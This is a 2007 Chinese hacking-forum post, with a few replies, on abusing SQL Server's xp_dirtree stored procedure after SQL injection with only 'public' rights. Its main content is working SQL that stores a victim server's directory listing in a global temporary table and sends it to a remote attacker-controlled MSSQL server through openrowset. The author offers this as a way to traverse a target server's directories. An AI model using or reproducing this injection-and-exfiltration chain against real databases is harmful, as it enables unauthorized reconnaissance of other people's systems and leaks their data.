[原创]MSSQL注入PUBLIC权限下的xp_dirtree再度利用(带视频动画)
文章作者:kj021320信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注意:本文章首发[url=http://blog.csdn.net/I_S_T_O/archive/2007/08/10/1736963.aspx]I.S.T.O技术团队[/url],后由原创作者友情提交到邪恶八进制信息安全团队论坛。[/b]
本来这文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...
正文:
提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧
--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
create table ##nonamed(
dir ntext,
num int
)
--调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1
--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了 为什么不把表建在PUBS数据库中呢?同样可以执行xp_dirtree 不是什么新技术
工具参考heige 05年写的cadt [quote]引用第3楼flyh4t于2007-08-11 23:04发表的 :
不是什么新技术
工具参考heige 05年写的cadt[/quote]
cadt最开始是根据dt修改的,开始得到信息是使用了临时表的,但是具体的功能没有,一直没有注意这个.
临时表 这个不错 顶一个
页:
[1]